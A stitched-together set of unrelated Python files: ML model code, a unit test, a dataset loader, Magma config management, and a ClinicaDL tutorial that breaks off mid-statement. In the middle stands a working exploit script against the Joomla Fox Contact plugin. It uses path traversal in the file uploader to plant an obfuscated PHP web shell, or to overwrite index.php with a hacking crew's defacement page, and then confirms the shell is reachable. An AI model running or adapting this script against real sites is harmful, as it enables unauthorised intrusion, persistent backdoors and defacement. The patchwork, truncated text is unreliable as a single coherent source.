# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import inspect
import os
import requests
import requests_mock
import tempfile
import unittest
from nose_parameterized import parameterized
from prov_interop import http
from prov_interop import standards
from prov_interop.component import ConfigError
from prov_interop.converter import ConversionError
from prov_interop.provtranslator.converter import ProvTranslatorConverter
class ProvTranslatorConverterTestCase(unittest.TestCase):
def setUp(self):
super(ProvTranslatorConverterTestCase, self).setUp()
self.provtranslator = ProvTranslatorConverter()
self.in_file = None
self.out_file = None
self.config = {}
self.config[ProvTranslatorConverter.URL] = \
"https://" + self.__class__.__name__
self.config[ProvTranslatorConverter.INPUT_FORMATS] = standards.FORMATS
self.config[ProvTranslatorConverter.OUTPUT_FORMATS] = standards.FORMATS
def tearDown(self):
super(ProvTranslatorConverterTestCase, self).tearDown()
for f in [self.in_file, self.out_file]:
if f != None and os.path.isfile(f):
os.remove(f)
def test_init(self):
self.assertEqual("", self.provtranslator.url)
self.assertEqual([], self.provtranslator.input_formats)
self.assertEqual([], self.provtranslator.output_formats)
def test_configure(self):
self.provtranslator.configure(self.config)
self.assertEqual(self.config[ProvTranslatorConverter.URL],
self.provtranslator.url)
self.assertEqual(self.config[ProvTranslatorConverter.INPUT_FORMATS],
self.provtranslator.input_formats)
self.assertEqual(self.config[ProvTranslatorConverter.OUTPUT_FORMATS],
self.provtranslator.output_formats)
def test_convert_missing_input_file(self):
self.provtranslator.configure(self.config)
self.in_file = "nosuchfile.json"
self.out_file = "convert_missing_input_file." + standards.JSON
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
def test_convert_invalid_input_format(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix=".nosuchformat")
self.out_file = "convert_invalid_input_format." + standards.PROVX
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
def test_convert_invalid_output_format(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + standards.JSON)
self.out_file = "convert_invalid_output_format.nosuchformat"
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
@parameterized.expand(standards.FORMATS)
def test_convert(self, format):
content_type = ProvTranslatorConverter.CONTENT_TYPES[format]
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + format)
(_, self.out_file) = tempfile.mkstemp(suffix="." + format)
doc = "mockDocument"
# Set up mock service response.
headers={http.CONTENT_TYPE: content_type,
http.ACCEPT: content_type}
with requests_mock.Mocker(real_http=False) as mocker:
mocker.register_uri("POST",
self.config[ProvTranslatorConverter.URL],
request_headers=headers,
text=doc)
self.provtranslator.convert(self.in_file, self.out_file)
with open(self.out_file, "r") as f:
self.assertEqual(doc, f.read(), "Unexpected output file content")
def test_convert_server_error(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + standards.JSON)
(_, self.out_file) = tempfile.mkstemp(suffix="." + standards.JSON)
# Set up mock service response with server error.
with requests_mock.Mocker(real_http=False) as mocker:
mocker.register_uri("POST",
self.config[ProvTranslatorConverter.URL],
status_code=requests.codes.internal_server_error)
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
|
# -*- coding: utf-8 -*-
"""Three-dimensional U-Net implemented in TensorFlow.
Reference
---------
Çiçek, Ö., Abdulkadir, A., Lienkamp, S. S., Brox, T., & Ronneberger, O. (2016)
3D U-Net: learning dense volumetric segmentation from sparse annotation.
International Conference on Medical Image Computing and Computer-Assisted
Intervention (pp. 424-432). Springer, Cham.
PDF available at https://arxiv.org/pdf/1606.06650.pdf.
"""
import tensorflow as tf
from tensorflow.contrib.estimator import TowerOptimizer
from tensorflow.contrib.estimator import replicate_model_fn
from tensorflow.python.estimator.canned.optimizers import (
get_optimizer_instance
)
from nobrainer import losses
from nobrainer import metrics
from nobrainer.models.util import check_optimizer_for_training
from nobrainer.models.util import check_required_params
from nobrainer.models.util import set_default_params
FUSED_BATCH_NORM = True
_regularizer = tf.contrib.layers.l2_regularizer(scale=0.001)
def _conv_block(x, filters1, filters2, mode, layer_num, batchnorm=True):
"""Convolution block.
    Args:
        x: float `Tensor`, input tensor.
        filters1: int, output space of first convolution.
        filters2: int, output space of second convolution.
        mode: string, TensorFlow mode key.
        layer_num: int, index used to name the variable scopes of this block.
        batchnorm: bool, if true, apply batch normalization after each
            convolution.
    Returns:
        `Tensor` of same type as `x`.
Notes:
```
inputs -> conv3d -> [batchnorm] -> relu -> conv3d -> [batchnorm] -> relu
```
"""
training = mode == tf.estimator.ModeKeys.TRAIN
with tf.variable_scope('conv_{}_0'.format(layer_num)):
x = tf.layers.conv3d(
inputs=x, filters=filters1, kernel_size=(3, 3, 3), padding='SAME', kernel_regularizer=_regularizer)
if batchnorm:
with tf.variable_scope('batchnorm_{}_0'.format(layer_num)):
x = tf.layers.batch_normalization(
inputs=x, training=training, fused=FUSED_BATCH_NORM)
with tf.variable_scope('relu_{}_0'.format(layer_num)):
x = tf.nn.relu(x)
with tf.variable_scope('conv_{}_1'.format(layer_num)):
x = tf.layers.conv3d(
inputs=x, filters=filters2, kernel_size=(3, 3, 3), padding='SAME', kernel_regularizer=_regularizer)
if batchnorm:
with tf.variable_scope('batchnorm_{}_1'.format(layer_num)):
x = tf.layers.batch_normalization(
inputs=x, training=training, fused=FUSED_BATCH_NORM)
with tf.variable_scope('relu_{}_1'.format(layer_num)):
x = tf.nn.relu(x)
return x
def model_fn(features, labels, mode, params, config=None):
"""3D U-Net model function.
    Args:
        features: float `Tensor` of input volumes, or a dict containing the
            key 'volume'.
        labels: int `Tensor` of ground-truth segmentation labels.
        mode: TensorFlow estimator mode key (TRAIN, EVAL or PREDICT).
        params: dict of hyperparameters; must contain 'n_classes', and may
            contain 'optimizer' and 'batchnorm'.
        config: optional estimator `RunConfig`.
    Returns:
        A `tf.estimator.EstimatorSpec` for the requested mode.
    Raises:
        See `check_required_params` and `check_optimizer_for_training`.
    """
volume = features
if isinstance(volume, dict):
volume = features['volume']
required_keys = {'n_classes'}
default_params ={
'optimizer': None,
'batchnorm': True,
}
check_required_params(params=params, required_keys=required_keys)
set_default_params(params=params, defaults=default_params)
check_optimizer_for_training(optimizer=params['optimizer'], mode=mode)
bn = params['batchnorm']
# start encoding
shortcut_1 = _conv_block(
volume, filters1=32, filters2=64, mode=mode, layer_num=0, batchnorm=bn)
with tf.variable_scope('maxpool_1'):
x = tf.layers.max_pooling3d(
inputs=shortcut_1, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
shortcut_2 = _conv_block(
x, filters1=64, filters2=128, mode=mode, layer_num=1, batchnorm=bn)
with tf.variable_scope('maxpool_2'):
x = tf.layers.max_pooling3d(
inputs=shortcut_2, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
shortcut_3 = _conv_block(
x, filters1=128, filters2=256, mode=mode, layer_num=2, batchnorm=bn)
with tf.variable_scope('maxpool_3'):
x = tf.layers.max_pooling3d(
inputs=shortcut_3, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
x = _conv_block(
x, filters1=256, filters2=512, mode=mode, layer_num=3, batchnorm=bn)
# start decoding
with tf.variable_scope("upconv_0"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=512, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_1'):
x = tf.concat((shortcut_3, x), axis=-1)
x = _conv_block(
x, filters1=256, filters2=256, mode=mode, layer_num=4, batchnorm=bn)
with tf.variable_scope("upconv_1"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=256, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_2'):
x = tf.concat((shortcut_2, x), axis=-1)
x = _conv_block(
x, filters1=128, filters2=128, mode=mode, layer_num=5, batchnorm=bn)
with tf.variable_scope("upconv_2"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=128, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_3'):
x = tf.concat((shortcut_1, x), axis=-1)
x = _conv_block(
x, filters1=64, filters2=64, mode=mode, layer_num=6, batchnorm=bn)
with tf.variable_scope('logits'):
logits = tf.layers.conv3d(
inputs=x, filters=params['n_classes'], kernel_size=(1, 1, 1),
padding='same', activation=None, kernel_regularizer=_regularizer)
# end decoding
with tf.variable_scope('predictions'):
predictions = tf.nn.softmax(logits=logits)
class_ids = tf.argmax(logits, axis=-1)
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'class_ids': class_ids,
'probabilities': predictions,
'logits': logits}
# Outputs for SavedModel.
export_outputs = {
'outputs': tf.estimator.export.PredictOutput(predictions)}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs=export_outputs)
onehot_labels = tf.one_hot(labels, params['n_classes'])
loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=onehot_labels, logits=logits)
# loss = tf.losses.softmax_cross_entropy(onehot_labels=onehot_labels, logits=logits)
l2_loss = tf.losses.get_regularization_loss()
loss += l2_loss
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
eval_metric_ops={
'dice': metrics.streaming_dice(
labels, class_ids, axis=(1, 2, 3)),
})
assert mode == tf.estimator.ModeKeys.TRAIN
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = params['optimizer'].minimize(loss, global_step=tf.train.get_global_step())
    dice_coefficients = tf.reduce_mean(
        metrics.dice(
            onehot_labels,
            tf.one_hot(class_ids, params['n_classes']),
            axis=(1, 2, 3)),
        axis=0)
logging_hook = tf.train.LoggingTensorHook(
{"loss" : loss, "dice": dice_coefficients}, every_n_iter=100)
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
training_hooks=[logging_hook])
class UNet3D(tf.estimator.Estimator):
"""Three-dimensional U-Net model.
"""
def __init__(self,
n_classes,
optimizer=None,
learning_rate=None,
batchnorm=True,
model_dir=None,
config=None,
warm_start_from=None,
multi_gpu=False):
params = {
'n_classes': n_classes,
# If an instance of an optimizer is passed in, this will just
# return it.
'optimizer': (
None if optimizer is None
else get_optimizer_instance(optimizer, learning_rate)),
'batchnorm': batchnorm,
}
_model_fn = model_fn
if multi_gpu:
params['optimizer'] = TowerOptimizer(params['optimizer'])
_model_fn = replicate_model_fn(_model_fn)
super(UNet3D, self).__init__(
model_fn=_model_fn, model_dir=model_dir, params=params,
config=config, warm_start_from=warm_start_from)
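# Illustrative usage (a sketch, not from the original module; `input_fn` is a
# hypothetical tf.estimator input function yielding (volume, label) batches):
#
#     estimator = UNet3D(n_classes=2, optimizer='Adam', learning_rate=1e-3,
#                        model_dir='/tmp/unet3d')
#     estimator.train(input_fn=input_fn, max_steps=1000)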
|
import numpy as np
import matplotlib.pyplot as plt
import scipy.cluster.hierarchy as hac
a = np.array([[0.11, 2.5],[1.45, 0.40],
[0.3, 1.1],[0.9 , 0.8],
[0.5, 0.01],[0.1 , 0.5],
[0.6, 0.5],[2.6, 2.1],
[2.3, 3.2],[3.1, 2.2],
[3.2, 1.3]])
name='possible\n<- knee point'
yName='{}\ncluster distance'
title='Screeplot{}'
t1=['#2200CC','#D9007E','#FF6600','#FFCC00']
t2=['#ACE600','#0099CC','#8900CC','#FF0000']
t3=['#FF9900' ,'#FFFF00','#00CC01' ,'#0055CC']
fig, axes23 = plt.subplots(2, 3)
for method, axes in zip(['single','complete'], axes23):
z = hac.linkage(a, method=method)
axes[0].plot(range(1, len(z)+1), z[::-1, 2])
knee = np.diff(z[::-1, 2], 2)
axes[0].plot(range(2, len(z)), knee)
num_clust1 = knee.argmax() + 2
knee[knee.argmax()] = 0
num_clust2 = knee.argmax() + 2
axes[0].text(num_clust1, z[::-1, 2][num_clust1-1], name)
part1 = hac.fcluster(z, num_clust1, 'maxclust')
part2 = hac.fcluster(z, num_clust2, 'maxclust')
clr = t1+t2+t3
for part,ax in zip([part1, part2], axes[1:]):
for cluster in set(part):
ax.scatter(a[part==cluster,0],a[part==cluster,1],
color=clr[cluster])
m = '\n(method: {})'.format(method)
plt.setp(axes[0],title=title.format(m),xlabel='partition',
ylabel=yName.format(m))
plt.setp(axes[1], title='{} Clusters'.format(num_clust1))
plt.setp(axes[2], title='{} Clusters'.format(num_clust2))
plt.tight_layout()
plt.show()
|
# -*- coding: utf-8 -*-
import colorama # pip3 install colorama
from colorama import Fore as F
import requests as r # pip3 install requests
import argparse as arg
import os as sistema
sistema.system('' if sistema.name == '' else '')
index = r"""
"""
def arruma(url):
if url[-1] != "/":
url = url + "/"
if url[:7] != "http://" and url[:8] != "https://":
url = "http://" + url
return url
user_agent = {'User-agent': 'Mozilla/5.0'}
parser = arg.ArgumentParser(description = "Exploit by supr3m0")
parser.add_argument("--url", action='store', help = "Site alvo.", required = True)
parser.add_argument("--cid", action='store', help = "ID do plugin", required = True)
parser.add_argument("--bypass", action='store_true', help = "Troca o cid para 0 e mid para o cid inserido")
parser.add_argument("--index", action='store_true', help = "Invade em index")
parser.add_argument("--threads", action='store', type = int, default = "10", help = "Tempo para cada requisição.")
param = parser.parse_args()
print(F.GREEN + index)
print(F.GREEN + "[+] Site:" + F.WHITE + "", param.url)
print(F.GREEN + "[+] ID:" + F.WHITE + "", param.cid)
if param.bypass:
cid_bypass = "0"
else:
cid_bypass = param.cid
joomla_diretorios = ["components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php".format(cid_bypass, param.cid), "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php".format(param.cid, cid_bypass, param.cid), "index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php".format(param.cid, cid_bypass, param.cid, param.cid), "components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php".format(cid_bypass, param.cid)]
shell = r"""<center>
<h5>Upload Form Yunkers Crew</h5>
<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>
</center>"""
diretorios = 0
if param.index:
joomla_diretorios = [letra.replace("/../../_func.php", "/../../../../index.php") for letra in joomla_diretorios]
shell = """
<html>
<head>
<meta charset="utf-8">
<title>./yc.py</title>
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">
</head>
<body bgcolor="white">
<center><font size="5" face="Lato" color="black">Hackeado pela</font></center>
<center><font size="10" face="Lato" color="black">Yunkers Crew</font></center>
<center><font size="3" face="Lato" color="black">Supr3m0 passou aqui :/</font></center>
<center><font size="3" face="Lato" color="black">Nois ta de volta, pra alegria dos hater haha</font></center>
<center><img src="http://cdn5.colorir.com/desenhos/pintar/fantasma-classico_2.png" alt="Smiley face" height="250" width="400"></center>
<center><font size="4" face="Lato" color="black">Somos: Supr3m0, W4r1o6k, V4por, F1r3Bl00d, Pr0sex & Cooldsec</font></center>
<center><font size="4" face="Lato" color="black">Salve: Xin0x, R41d, Junin, M0nst4r & CryptonKing, Jonas sz</font></center>
</br>
<center><font size="5" face="Lato" color="black"><u>www.facebook.com/yunkers01/</u></font></center>
<iframe width="1" height="1" src="https://www.youtube.com/embed/K4xl1T_lyiM?autoplay=1&controls=0&repeat=1" frameborder="0" allowfullscreen></iframe>
</body>
</html>
"""
url = arruma(param.url)
try:
for diretorio in joomla_diretorios:
diretorios += 1
url_vuln = url + diretorio
shell_dir = url + "components/com_foxcontact/_func.php"
checa_site = r.get(url_vuln, headers=user_agent)
if '{"' in checa_site.text:
print(F.GREEN + "\n[!] " + F.WHITE + " Sending payloads {}...".format(diretorios))
envia_shell = r.post(url_vuln, data=shell, headers=user_agent)
print(F.YELLOW + "[!] "+ F.WHITE + "Response:")
print(F.CYAN + envia_shell.text)
verifica_shell = r.get(shell_dir, headers=user_agent)
if verifica_shell.status_code != 404:
print(F.GREEN + "\n[*]" + F.WHITE + " Shell succesfully uploaded!")
print(F.GREEN + "[+]" + F.WHITE + " URL : "+shell_dir)
input("press enter to continue...")
else:
print(F.RED + "[-] "+ F.WHITE + "Can't react shell : ", shell_dir)
else:
print(F.RED + "\n[-] " + F.WHITE + " Not vulnerable : {}.".format(diretorios))
except Exception as iu:
print(iu)
print(F.WHITE + "")
|
import logging
import os
from pathlib import Path
from torchvision import datasets
import datasetinsights.constants as const
from datasetinsights.storage.gcs import GCSClient
from .base import Dataset
CITYSCAPES_GCS_PATH = "data/cityscapes"
CITYSCAPES_LOCAL_PATH = "cityscapes"
ZIPFILES = [
"leftImg8bit_trainvaltest.zip",
"gtFine_trainvaltest.zip",
]
CITYSCAPES_COLOR_MAPPING = {c.id: c.color for c in datasets.Cityscapes.classes}
logger = logging.getLogger(__name__)
class Cityscapes(Dataset):
"""
Args:
data_root (str): root directory prefix of all datasets
split (str): indicate split type of the dataset (train|val|test)
Attributes:
root (str): root directory of the dataset
split (str): indicate split type of the dataset (train|val|test)
"""
def __init__(
self,
*,
data_root=const.DEFAULT_DATA_ROOT,
split="train",
transforms=None,
**kwargs,
):
self.root = os.path.join(data_root, CITYSCAPES_LOCAL_PATH)
self.split = split
self.download(CITYSCAPES_GCS_PATH)
self._cityscapes = datasets.Cityscapes(
self.root,
split=split,
mode="fine",
target_type="semantic",
transforms=transforms,
)
def __getitem__(self, index):
return self._cityscapes[index]
def __len__(self):
return len(self._cityscapes)
def download(self, cloud_path):
"""Download cityscapes dataset
Note:
The current implementation assumes a GCS cloud path.
Should we keep this method here if we want to support other cloud
storage system?
Args:
cloud_path (str): cloud path of the dataset
"""
path = Path(self.root)
path.mkdir(parents=True, exist_ok=True)
for zipfile in ZIPFILES:
localfile = os.path.join(self.root, zipfile)
if os.path.isfile(localfile):
# TODO: Check file hash to verify file integrity
logger.debug(f"File {localfile} exists. Skip download.")
continue
client = GCSClient()
object_key = os.path.join(CITYSCAPES_GCS_PATH, zipfile)
logger.debug(
f"Downloading file {localfile} from gs://{const.GCS_BUCKET}/"
f"{object_key}"
)
client.download(const.GCS_BUCKET, object_key, localfile)
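# Illustrative usage (a sketch; assumes GCS credentials and the default data
# root are configured):
#
#     train_set = Cityscapes(data_root="/data", split="train")
#     image, target = train_set[0]
#     print(len(train_set))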
|
from distutils.core import setup
setup(
name = 'pyfluidsynth3',
version = '1',
description = "Fluidsynth bindings for Python 3.",
author = 'Stefan Gfroerer',
url = 'https://github.com/tea2code/pyfluidsynth3',
packages = ['pyfluidsynth3'],
)
|
from IMLearn.learners import UnivariateGaussian, MultivariateGaussian
import numpy as np
import plotly.graph_objects as go
import matplotlib.pyplot as plt
import plotly.io as pio
pio.templates.default = "simple_white"
def test_univariate_gaussian():
# Question 1 - Draw samples and print fitted model
c = UnivariateGaussian()
true_expectation = 10
true_var = 1
sample = np.random.normal(true_expectation, true_var, size=1000)
c.fit(sample)
# Question 2 - Empirically showing sample mean is consistent
sample_size_array = np.arange(10, 1010, 10)
absolute_expectation_distances = []
for sample_size in sample_size_array:
        selected_sample = sample[:sample_size]
c.fit(selected_sample)
absolute_expectation_distances.append(abs(c.mu_-true_expectation))
plt.scatter(sample_size_array, absolute_expectation_distances)
plt.yticks(np.arange(0, max(absolute_expectation_distances) + 0.1, 0.1))
plt.ylim(0, max(absolute_expectation_distances)+0.1)
plt.title("Absolute Distance From Expectation Per Sample Size")
plt.xlabel("Sample Size")
plt.ylabel("Absolute Distance")
plt.show()
# Question 3 - Plotting Empirical PDF of fitted model
plt.scatter(sample, c.pdf(sample))
plt.title("Samples PDF")
plt.xlabel("Sample Value")
plt.ylabel("PDF")
plt.show()
def test_multivariate_gaussian():
# Question 4 - Draw samples and print fitted model
raise NotImplementedError()
# Question 5 - Likelihood evaluation
raise NotImplementedError()
# Question 6 - Maximum likelihood
raise NotImplementedError()
if __name__ == '__main__':
np.random.seed(0)
test_univariate_gaussian()
test_multivariate_gaussian()
|
from .task import Task
from .activity_task import ActivityTask
from .timer import Timer
from .generator import Generator
from .child_workflow import ChildWorkflow
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
import contextlib
import json
import os
from typing import Any, Generic, TypeVar
import magma.configuration.events as magma_configuration_events
from google.protobuf import json_format
from magma.common import serialization_utils
from magma.configuration.exceptions import LoadConfigError
from magma.configuration.mconfigs import (
filter_configs_by_key,
unpack_mconfig_any,
)
from orc8r.protos.mconfig_pb2 import GatewayConfigs, GatewayConfigsMetadata
T = TypeVar('T')
MCONFIG_DIR = '/etc/magma'
MCONFIG_OVERRIDE_DIR = '/var/opt/magma/configs'
DEFAULT_MCONFIG_DIR = os.environ.get('MAGMA_CONFIG_LOCATION', MCONFIG_DIR)
def get_mconfig_manager():
"""
Get the mconfig manager implementation that the system is configured to
use.
Returns: MconfigManager implementation
"""
# This is stubbed out after deleting the streamed mconfig manager
return MconfigManagerImpl()
def load_service_mconfig(service: str, mconfig_struct: Any) -> Any:
"""
Utility function to load the mconfig for a specific service using the
configured mconfig manager.
"""
return get_mconfig_manager().load_service_mconfig(service, mconfig_struct)
def load_service_mconfig_as_json(service_name: str) -> Any:
"""
Loads the managed configuration from its json file stored on disk.
Args:
service_name (str): name of the service to load the config for
Returns: Loaded config value for the service as parsed json struct, not
protobuf message struct
"""
return get_mconfig_manager().load_service_mconfig_as_json(service_name)
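# Illustrative usage (a sketch; `MagmadConfig` stands in for whatever protobuf
# message type the "magmad" service uses and is not defined in this module):
#
#     magmad_cfg = load_service_mconfig('magmad', MagmadConfig())
#     magmad_json = load_service_mconfig_as_json('magmad')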
class MconfigManager(Generic[T]):
"""
Interface for a class which handles loading and updating some cloud-
managed configuration (mconfig).
"""
@abc.abstractmethod
def load_mconfig(self) -> T:
"""
Load the managed configuration from its stored location.
Returns: Loaded mconfig
"""
pass
@abc.abstractmethod
def load_service_mconfig(
self, service_name: str,
mconfig_struct: Any,
) -> Any:
"""
Load a specific service's managed configuration.
Args:
service_name (str): name of the service to load a config for
mconfig_struct (Any): protobuf message struct of the managed config
for the service
Returns: Loaded config value for the service
"""
pass
@abc.abstractmethod
def load_mconfig_metadata(self) -> GatewayConfigsMetadata:
"""
Load the metadata of the managed configuration.
Returns: Loaded mconfig metadata
"""
pass
@abc.abstractmethod
def update_stored_mconfig(self, updated_value: str):
"""
Update the stored mconfig to the provided serialized value
Args:
updated_value: Serialized value of new mconfig value to store
"""
pass
@abc.abstractmethod
def deserialize_mconfig(
self, serialized_value: str,
allow_unknown_fields: bool = True,
) -> T:
"""
Deserialize the given string to the managed mconfig.
Args:
serialized_value:
Serialized value of a managed mconfig
allow_unknown_fields:
Set to true to suppress errors from parsing unknown fields
Returns: deserialized mconfig value
"""
pass
@abc.abstractmethod
def delete_stored_mconfig(self):
"""
Delete the stored mconfig file.
"""
pass
class MconfigManagerImpl(MconfigManager[GatewayConfigs]):
"""
Legacy mconfig manager for non-offset mconfigs
"""
MCONFIG_FILE_NAME = 'gateway.mconfig'
MCONFIG_PATH = os.path.join(MCONFIG_OVERRIDE_DIR, MCONFIG_FILE_NAME)
def load_mconfig(self) -> GatewayConfigs:
cfg_file_name = self._get_mconfig_file_path()
try:
with open(cfg_file_name, 'r', encoding='utf-8') as cfg_file:
mconfig_str = cfg_file.read()
return self.deserialize_mconfig(mconfig_str)
except (OSError, json.JSONDecodeError, json_format.ParseError) as e:
raise LoadConfigError('Error loading mconfig') from e
def load_service_mconfig(
self, service_name: str,
mconfig_struct: Any,
) -> Any:
mconfig = self.load_mconfig()
if service_name not in mconfig.configs_by_key:
raise LoadConfigError(
"Service ({}) missing in mconfig".format(service_name),
)
service_mconfig = mconfig.configs_by_key[service_name]
return unpack_mconfig_any(service_mconfig, mconfig_struct)
def load_service_mconfig_as_json(self, service_name) -> Any:
cfg_file_name = self._get_mconfig_file_path()
with open(cfg_file_name, 'r', encoding='utf-8') as f:
json_mconfig = json.load(f)
service_configs = json_mconfig.get('configsByKey', {})
service_configs.update(json_mconfig.get('configs_by_key', {}))
if service_name not in service_configs:
raise LoadConfigError(
"Service ({}) missing in mconfig".format(service_name),
)
return service_configs[service_name]
def load_mconfig_metadata(self) -> GatewayConfigsMetadata:
mconfig = self.load_mconfig()
return mconfig.metadata
def deserialize_mconfig(
self, serialized_value: str,
allow_unknown_fields: bool = True,
) -> GatewayConfigs:
# First parse as JSON in case there are types unrecognized by
# protobuf symbol database
json_mconfig = json.loads(serialized_value)
cfgs_by_key_json = json_mconfig.get('configs_by_key', {})
cfgs_by_key_json.update(json_mconfig.get('configsByKey', {}))
filtered_cfgs_by_key = filter_configs_by_key(cfgs_by_key_json)
# Set configs to filtered map, re-dump and parse
if 'configs_by_key' in json_mconfig:
json_mconfig.pop('configs_by_key')
json_mconfig['configsByKey'] = filtered_cfgs_by_key
json_mconfig_dumped = json.dumps(json_mconfig)
# Workaround for outdated protobuf library on sandcastle
if allow_unknown_fields:
return json_format.Parse(
json_mconfig_dumped,
GatewayConfigs(),
ignore_unknown_fields=True,
)
else:
return json_format.Parse(json_mconfig_dumped, GatewayConfigs())
def delete_stored_mconfig(self):
with contextlib.suppress(FileNotFoundError):
os.remove(self.MCONFIG_PATH)
magma_configuration_events.deleted_stored_mconfig()
    def update_stored_mconfig(self, updated_value: str):
parsed = json.loads(updated_value)
serialization_utils.write_to_file_atomically(
self.MCONFIG_PATH, json.dumps(parsed, indent=4, sort_keys=True),
)
magma_configuration_events.updated_stored_mconfig()
def _get_mconfig_file_path(self):
if os.path.isfile(self.MCONFIG_PATH):
return self.MCONFIG_PATH
else:
return os.path.join(DEFAULT_MCONFIG_DIR, self.MCONFIG_FILE_NAME)
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.5'
# jupytext_version: 1.13.3
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %%
# Uncomment this cell if running in Google Colab
# !pip install clinicadl==0.2.1
# !curl -k https://aramislab.paris.inria.fr/files/data/databases/tuto/dataOasis.tar.gz -o dataOasis.tar.gz
# !tar xf dataOasis.tar.gz
# %% [markdown]
# # Launch a random search
# The previous section focused on a way to debug a non-automated architecture
# search. However, if you have enough computational power, you may want to launch
# an automated architecture search to save time. This is the purpose of the
# random search method of clinicadl.
# <div class="alert alert-block alert-info">
# <b>Non-optimal result:</b><p>
# A random search may find a better-performing network, but there is no guarantee that it is the best-performing one.
# </div>
# This notebook relies on the synthetic data generated in the previous notebook.
# If you did not run it, uncomment the following cell to generate the
# corresponding dataset.
# %%
import os
# os.makedirs("data", exist_ok=True)
# !curl -k https://aramislab.paris.inria.fr/files/data/databases/tuto/synthetic.tar.gz -o synthetic.tar.gz
# !tar xf synthetic.tar.gz -C data
# %% [markdown]
# ## Define the hyperparameter space
# A random search is performed according to hyperparameters of the network that
# are sampled from a pre-defined space.
# For example, you may want your random network to have at most 3
# fully-convolutional layers if you don't have enough memory to handle more.
# This hyperparameter space is defined in a JSON file that must be written in your
# random search directory: `random_search.json`.
# The following function `generate_dict` generates a dictionary that will be written
# to `random_search.json` for this tutorial. To accelerate the training task we
# will use a single CNN on the default region of interest, the hippocampi.
# %%
def generate_dict(mode, caps_dir, tsv_path, preprocessing):
return {
"caps_dir": caps_dir,
"tsv_path": tsv_path,
"diagnoses": ["AD", "CN"],
"preprocessing": preprocessing,
"mode": mode,
"network_type": "cnn",
"epochs": 30,
"learning_rate": [4, 6],
"n_convblocks": [1, 5], # Number of convolutional blocks
"first_conv_width": [8, 16, 32, 64], # Number of channels in the first convolutional block
"n_fcblocks": [1, 3], # Number of (fully-connected + activation) layers
"selection_threshold": [0.5, 1] # Threshold at which a region is selected if its corresponding
# balanced accuracy is higher.
}
# %% [markdown]
# In this default dictionary we set all the arguments that are mandatory for the
# random search. Hyperparameters for which a space is not defined will
# automatically take their default value in all cases.
# Hyperparameters can be sampled in 4 different ways (illustrated in the cell below):
# - choice samples one element from a list (ex: `first_conv_width`),
# - uniform draws samples from a uniform distribution over the interval [min, max] (ex: `selection_threshold`),
# - exponent draws x from a uniform distribution over the interval [min, max] and returns $10^{-x}$ (ex: `learning_rate`),
# - randint returns an integer in [min, max] (ex: `n_convblocks`).
# In the default dictionary, the learning rate will be sampled between $10^{-4}$
# and $10^{-6}$.
# This dictionary is written as a JSON file in the `launch_dir` of the
# random search.
# You can configure other hyperparameters differently by looking at the
# [documentation](https://clinicadl.readthedocs.io/).
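# %% [markdown]
# The short cell below mimics these four sampling strategies with plain NumPy.
# It is only an illustration of the sampling semantics, not ClinicaDL's
# internal implementation.
# %%
import numpy as np
rng = np.random.default_rng(0)
sampled = {
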